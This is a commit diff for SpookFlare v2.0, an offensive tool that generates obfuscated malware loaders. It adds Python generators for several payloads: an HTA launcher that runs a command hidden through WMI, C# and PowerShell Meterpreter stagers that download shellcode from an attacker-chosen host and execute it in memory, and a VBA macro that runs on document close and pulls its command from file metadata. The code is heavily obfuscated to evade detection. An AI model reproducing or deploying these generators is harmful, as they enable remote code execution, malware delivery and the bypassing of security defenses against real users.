New release

SpookFlare v2.0. New payloads, new structure.
hlldz · May 2, 2018 · 2df14aa · 2df14aa
1 parent 7aa3f24
commit 2df14aa
Show file tree

Hide file tree

Showing 8 changed files with 743 additions and 0 deletions.
diff --git a/lib/__init__.py b/lib/__init__.py
@@ -0,0 +1 @@
+
diff --git a/lib/sfhta.py b/lib/sfhta.py
@@ -0,0 +1,104 @@
+# -*- coding: utf-8 -*-
+import random
+import string
+import base64
+
+def randomString():
+    return ''.join([random.choice(string.ascii_letters) for n in xrange(12)])
+
+def generateKey():
+    keys = "!#+%&/()=?_-*[]$><"
+    return ''.join(random.sample(keys,len(keys)))
+
+def generateBase(htaCommand, htaFileName):
+    htaKey = generateKey()
+    if "\"" in htaCommand:
+        htaPayload = htaKey.join([htaCommand[i:i+1] for i in range(0, len(htaCommand), 1)]).replace("\"", "\"\"")
+    else:
+        htaPayload = htaKey.join([htaCommand[i:i+1] for i in range(0, len(htaCommand), 1)])
+
+    baseHta = '''<script language="VBScript">
+        Sub window_onload
+            Set {0} = CreateObject("WbemScripting.SWbemLocator")
+            Set {1} = {0}.ConnectServer()
+            {1}.Security_.ImpersonationLevel=3
+            Set {2} = {1}.Get("Win32_ProcessStartup")
+            Set {3} = {2}.SpawnInstance_
+            {3}.ShowWindow = 12
+            Set {4} = {1}.Get("Win32_Process")
+            {6} = {4}.Create(Replace("'''+htaPayload+'''", "'''+htaKey+'''", ""), NULL, {3}, {5})
+            window.close()
+        End Sub
+</script>'''
+
+    launcherBase = '''<html><head><script type="text/javascript">var {0} = atob("'''+base64.b64encode(baseHta.format(randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), randomString()))+'''");var {1} = "'''+htaFileName+'''.hta";var {2} = new Blob([{0}], {{type: 'plain/text;charset=utf-8;'}});var {3} = null;if (navigator.msSaveBlob) {{{3} = navigator.msSaveBlob({2}, {1});}} else {{{3} = window.URL.createObjectURL({2});}}var {4} = document.createElement('a');{4}.href = {3};{4}.setAttribute('download', {1});document.body.appendChild({4});{4}.click();document.body.removeChild({4});</script></head></body></html>'''
+    launcherFinal = launcherBase.format(randomString(), randomString(), randomString(), randomString(), randomString())
+    return launcherFinal
+cdata = " "
+def obfuscateHta(launcherFinal):
+    finalPayload = "<html><body><head><script type=\"text/javascript\">var {0}=new Array;"
+    stcData = []
+    i = 0
+    cdata = " "
+    while i < len(list(launcherFinal)):
+        stringToChar = ord(list(list(launcherFinal))[i])
+        i+=1
+        if i != len(list(launcherFinal)) - 0:
+            stcData.append(str(stringToChar))
+        else:
+            stcData.append(str(stringToChar))
+    deep = len(stcData)
+    if deep % 4 == 0:
+        i = 0
+        x = -1
+        while i < deep:
+            code = 	(int(stcData[i]) * 256 + int(stcData[i+1]))
+            code =+ ((code * 256 ** 2) / 256 + int(stcData[i+2]))
+            code =+ ((code * 256 ** 3) / 256 ** 2 + int(stcData[i+3]))
+            i += 4
+            x +=1
+            finalPayload += "{0}["+ str(x) + "]=" + str(code) + ";"
+    elif deep % 4 == 3:
+        cdata = stcData [deep - 3:deep]
+        ndata = stcData [0:deep - 3]
+        i = 0
+        x = -1
+        while i < deep - 3:
+            code = 	(int(ndata[i]) * 256 + int(ndata[i+1]))
+            code =+ ((code * 256 ** 2) / 256 + int(ndata[i+2]))
+            code =+ ((code * 256 ** 3) / 256 ** 2 + int(ndata[i+3]))
+            i += 4
+            x +=1
+            finalPayload += "{0}["+ str(x) + "]=" + str(code) + ";"
+        ccode =  (int(cdata[0]) * 256 + int(cdata[1]))
+        ccode =+ ((ccode * 256 ** 2) / 256 + int(cdata[2]))
+        finalPayload += "{0}["+ str(x + 1) + "]=" + str(ccode) + ";"
+    elif deep % 4 == 2:
+        cdata = stcData [deep - 2:deep]
+        ndata = stcData [0:deep - 2]
+        i = 0
+        x = -1
+        while i < deep - 2:
+            code = 	(int(ndata[i]) * 256 + int(ndata[i+1]))
+            code =+ ((code * 256 ** 2) / 256 + int(ndata[i+2]))
+            code =+ ((code * 256 ** 3) / 256 ** 2 + int(ndata[i+3]))
+            i += 4
+            x +=1
+            finalPayload +="{0}["+ str(x) + "]=" + str(code) + ";"
+        ccode =  (int(cdata[0]) * 256 + int(cdata[1]))
+        finalPayload +="{0}["+ str(x + 1) + "]=" + str(ccode) + ";"
+    elif deep % 4 == 1:
+        cdata = stcData [deep - 1:deep]
+        ndata = stcData [0:deep - 1]
+        i = 0
+        x = -1
+        while i < deep - 1:
+            code = 	(int(ndata[i]) * 256 + int(ndata[i+1]))
+            code =+ ((code * 256 ** 2) / 256 + int(ndata[i+2]))
+            code =+ ((code * 256 ** 3) / 256 ** 2 + int(ndata[i+3]))
+            i += 4
+            x +=1
+            finalPayload +="{0}["+ str(x) + "]=" + str(code) + ";"
+
+    finalPayload +="var {1}=\"\";for(i=0;i<{0}.length;i++){2}={0}[i],Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,3))>0&&({1}+=String.fromCharCode(Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,3)))),{2}-=Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,3))*Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,3),Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,2))>0&&({1}+=String.fromCharCode(Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,2)))),{2}-=Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,2))*Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,2),Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,1))>0&&({1}+=String.fromCharCode(Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,1)))),{2}-=Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,1))*Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,1),Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,0))>0&&({1}+=String.fromCharCode(Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,0))));document.write({1});</script></head></body></html>"
+    return finalPayload.format(randomString(), randomString(), randomString())
diff --git a/lib/sfmpbin.py b/lib/sfmpbin.py
@@ -0,0 +1,41 @@
+# -*- coding: utf-8 -*-
+import random
+import string
+import base64
+from base64 import b64encode
+
+def randomString():
+    return ''.join([random.choice(string.ascii_letters) for n in xrange(12)])
+
+def checksum8(s):
+	return sum([ord(ch) for ch in s]) % 0x100
+
+def genHTTPChecksum():
+	chk = string.ascii_letters + string.digits
+	for x in xrange(64):
+		uri = "".join(random.sample(chk,3))
+		r = "".join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))
+		for char in r:
+			if checksum8(uri + char) == 92:
+				return uri + char 
+
+def generateMPBinLoader(mpBinProto, mpBinLhost, mpBinLport, mpBinArch, mpBinSsize):
+
+    if mpBinProto == "https":
+        mpBinSSLChk = "ServicePointManager.ServerCertificateValidationCallback = (sender, cert, chain, sslPolicyErrors) => true;"
+    else:
+        mpBinSSLChk = ""
+
+    if mpBinArch == "x86":
+        mpBinArch = "UInt32"
+    elif mpBinArch == "x64":
+        mpBinArch = "UInt64"
+
+    mpBinNSpace = randomString()
+    mpBinLClass = randomString()
+    loaderHost = mpBinProto+"://"+mpBinLhost+":"+mpBinLport+"/"+genHTTPChecksum()
+    loaderBase = '''using System;using System.Net;using System.Runtime.InteropServices; namespace {24} {{ public class {25} {{ [DllImport ("kernel32")] private static extern {23} VirtualAlloc ({23} {0}, {23} {1}, {23} {2}, {23} {3}); [DllImport ("kernel32")] private static extern IntPtr CreateThread ({23} {4}, {23} {5}, {23} {6}, IntPtr {7}, {23} {8}, ref {23} {9}); [DllImport ("kernel32")] private static extern {23} WaitForSingleObject (IntPtr {10}, {23} {11}); [DllImport ("kernel32.dll")] static extern IntPtr GetConsoleWindow (); [DllImport ("user32.dll")] static extern bool ShowWindow (IntPtr {12}, int {13}); public static void Main () {{ShowWindow (GetConsoleWindow (), 0);{14}WebClient {15} = new System.Net.WebClient ();{15}.Headers.Add ("User-Agent", "Mozilla/5.0 (compatible; MSIE 11.0; Trident/7.0; rv:11.0)");{15}.Headers.Add ("Accept", "*/*");{15}.Headers.Add ("Accept-Language", "en-gb,en;q=0.5");byte[] {16} = null;{16} = {15}.DownloadData ("{26}");byte[] {17} = new byte[{16}.Length - {18}];Array.Copy ({16}, {18}, {17}, 0, {17}.Length);{23} {19} = VirtualAlloc (0, ({23}) {17}.Length, 0x1000, 0x40);Marshal.Copy ({17}, 0, (IntPtr) ({19}), {17}.Length);IntPtr {20} = IntPtr.Zero;{23} {21} = 0;IntPtr {22} = IntPtr.Zero;{20} = CreateThread (0, 0, {19}, {22}, 0, ref {21});WaitForSingleObject ({20}, 0xFFFFFFFF);}}}}}}'''.format(randomString(), randomString(), randomString(), randomString(),randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), mpBinSSLChk, randomString(), randomString(), randomString(), mpBinSsize, randomString(), randomString(), randomString(), randomString(), mpBinArch, mpBinNSpace, mpBinLClass, loaderHost)
+    loaderKey = (''.join(random.sample("hlldzé!^+%&/()=?_<>£#$[]|",len("hlldzé!^+%&/()=?_<>£#$[]|")))[0:3])
+    loaderCode = loaderKey.join([loaderBase[i:i+1] for i in range(0, len(loaderBase), 1)]).replace("\"", "\\\"")
+    loaderFinal = '''using System;using System.CodeDom.Compiler;using System.Reflection;using Microsoft.CSharp;namespace {0} {{public class {1} {{public static void Main () {{string {2} = "{3}".Replace("{4}", "");CSharpCodeProvider {5} = new CSharpCodeProvider ();CompilerParameters {6} = new CompilerParameters (new [] {{"mscorlib.dll", "System.dll"}});{6}.GenerateInMemory = true;{6}.ReferencedAssemblies.Add (Assembly.GetEntryAssembly ().Location);CompilerResults {7} = {5}.CompileAssemblyFromSource ({6}, {2});Assembly {8} = {7}.CompiledAssembly;Type {9} = {8}.GetType ("{10}.{11}");MethodInfo {12} = {9}.GetMethod ("Main");{12}.Invoke (null, null);}}}}}}'''.format(randomString(), randomString(), randomString(), loaderCode, loaderKey, randomString(), randomString(), randomString(), randomString(), randomString(), mpBinNSpace, mpBinLClass, randomString())
+    return loaderFinal
diff --git a/lib/sfmpps.py b/lib/sfmpps.py
@@ -0,0 +1,60 @@
+# -*- coding: utf-8 -*-
+import random
+import string
+import base64
+from base64 import b64encode
+
+def randomString():
+    return ''.join([random.choice(string.ascii_letters) for n in xrange(12)])
+
+def checksum8(s):
+	return sum([ord(ch) for ch in s]) % 0x100
+
+def genHTTPChecksum():
+	chk = string.ascii_letters + string.digits
+	for x in xrange(64):
+		uri = "".join(random.sample(chk,3))
+		r = "".join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))
+		for char in r:
+			if checksum8(uri + char) == 92:
+				return uri + char
+
+def generateMPPSLoader(mpProto, mpLhost, mpLport, mpArch, mpSsize):
+    if mpArch == "x86":
+        mpArch = "ToInt32"
+        mpDef = "UInt32"
+    elif mpArch == "x64":
+        mpArch = "ToInt64"
+        mpDef = "UInt64"
+
+    loaderHost = mpProto+"://"+mpLhost+":"+mpLport+"/"+genHTTPChecksum()
+    baseMetPs = '''${0} = @"
+[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, {8} dwSize, {8} flAllocationType, {8} flProtect);
+[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, {8} dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, {8} dwCreationFlags, IntPtr lpThreadId);
+[DllImport("kernel32.dll")] public static extern {8} WaitForSingleObject(IntPtr hHandle, {8} dwMilliseconds);
+"@;
+${1} = New-Object "`N`et.`W`ebc`l`i`ent";${1}.Headers.Add("User-Agent", "Mozilla/5.0 (compatible; MSIE 11.0; Trident/7.0; rv:11.0)");${1}.Headers.Add("Accept", "*/*");${1}.Headers.Add("Accept-Language", "en-gb,en;q=0.5");[Byte[]] ${2} = ${1}."D`o`wn`l`oa`d`Data"("{9}");${3} = New-Object byte[] (${2}.Length - {4});[Array]::Copy(${2}, {4}, ${3}, 0, (${2}.Length - {4}));${5} = A`d`d-T`y`p`e -memberDefinition ${0} -Name "Win32" -namespace `W`in`3`2`F`un`ct`i`on`s -passthru;${6}=${5}::VirtualAlloc(0,${3}.Length,0x3000,0x40);[Runtime.InteropServices.Marshal]::Copy(${3}, 0, [IntPtr](${6}.{7}()), ${3}.Length);${5}::CreateThread(0,0,${6},0,0,0) | oUT-NuLl;`S`T`A`R`T-`S`l`e`E`p -s `8`6`4`2`0'''
+
+    loaderFinal = baseMetPs.format(randomString(), randomString(), randomString(), randomString(), mpSsize, randomString(), randomString(), mpArch, mpDef, loaderHost)
+    return loaderFinal
+
+def generateMPPSCsharpLoader(mpPsCode):
+    mCsharpCode = '''using System;
+using System.IO; using System.Diagnostics; using System.Reflection; using System.Runtime.InteropServices; using System.Collections.ObjectModel; using System.Management.Automation; using System.Management.Automation.Runspaces; using System.Text;     
+public class {0} {{
+    public static void Main() {{
+        byte[] {1} = Convert.FromBase64String("{6}");
+		string {2} = Encoding.Unicode.GetString({1});
+		{3} {3} = RunspaceFactory.CreateRunspace();
+        {3}.Open();
+        RunspaceInvoke {4} = new RunspaceInvoke({3});
+        {5} {5} = {3}.CreatePipeline();
+        {5}.Commands.AddScript({2});
+        {5}.Invoke();
+        {3}.Close();
+        return;
+    }}
+}}'''
+
+    loaderFinal = mCsharpCode.format(randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), b64encode(mpPsCode).encode("UTF-16LE"))
+    return loaderFinal
diff --git a/lib/sfvba.py b/lib/sfvba.py
@@ -0,0 +1,59 @@
+# -*- coding: utf-8 -*-
+import random
+import string
+import base64
+
+def randomString():
+    return ''.join([random.choice(string.ascii_letters) for n in xrange(12)])
+
+def generateKey():
+    keys = "!#+%&/()=?_-*[]{}$><"
+    return ''.join(random.sample(keys,len(keys)))
+
+def generateCmd(vbaKey, vbaCommand):
+    return vbaKey.join([vbaCommand[i:i+1] for i in range(0, len(vbaCommand), 1)])
+
+def generateVBALauncher(vbaFileType, vbaCommand, vbaMetaName):
+
+    if vbaFileType == "word":
+        vbaFileType = "ActiveDocument"
+    elif vbaFileType == "excel":
+        vbaFileType = "ActiveWorkbook"
+    elif vbaFileType == "powerpoint":
+        vbaFileType = "ActivePresentation"
+
+    if vbaMetaName == "Comments":
+        vbaMetaName = "C\"&\"o\"&\"m\"&\"m\"&\"e\"&\"n\"&\"t\"&\"s"
+    elif vbaMetaName == "Company":
+        vbaMetaName = "C\"&\"o\"&\"m\"&\"p\"&\"a\"&\"n\"&\"y"
+
+    vbaCommandKey = generateKey()
+    vbaBaseCmd = generateCmd(vbaCommandKey, vbaCommand)
+    vbaBaseCode = '''Sub Auto_Close()
+    {0}
+End Sub
+
+Sub AutoClose()
+    {0}
+End Sub
+
+Public Function {0}() As Variant
+    Dim {1} As DocumentProperty
+    For Each {1} In {8}.BuiltInDocumentProperties
+        If {1}.Name = "{10}" Then
+            Dim {2} As String
+            {2} = Replace({1}.Value, "{9}", "")
+            Const HIDDEN_WINDOW = 0
+            Set {3} = GetObject("w"&"i"&"n"&"m"&"g"&"m"&"t"&"s"&":"&"\\"&"\\"&"."&"\\"&"r"&"o"&"o"&"t"&"\\"&"c"&"i"&"m"&"v"&"2")
+            Set {4} = {3}.Get("W"&"i"&"n"&"3"&"2"&"_"&"P"&"r"&"o"&"c"&"e"&"s"&"s"&"S"&"t"&"a"&"r"&"t"&"u"&"p")
+            Set {5} = {4}.SpawnInstance_
+            {5}.ShowWindow = HIDDEN_WINDOW
+            Set {6} = GetObject("w"&"i"&"n"&"m"&"g"&"m"&"t"&"s"&":"&"\\"&"\\"&"."&"\\"&"r"&"o"&"o"&"t"&"\\"&"c"&"i"&"m"&"v"&"2"&":"&"W"&"i"&"n"&"3"&"2"&"_"&"P"&"r"&"o"&"c"&"e"&"s"&"s")
+            {6}.Create {2}, Null, {5}, {7}
+        End If
+    Next
+End Function'''
+
+    loaderFinal = "'\n'Insert the following string to \""+vbaMetaName.replace("\"&\"", "")+"\" meta data section of file:\n'" + vbaBaseCmd + "\n'\n\n"
+    loaderFinal += vbaBaseCode.format(randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), vbaFileType, vbaCommandKey, vbaMetaName)
+    return loaderFinal
diff --git a/output/test.spookflare.txt b/output/test.spookflare.txt
@@ -0,0 +1 @@
+
diff --git a/requirements.txt b/requirements.txt
@@ -0,0 +1,3 @@
+cmd
+terminaltables
+textwrap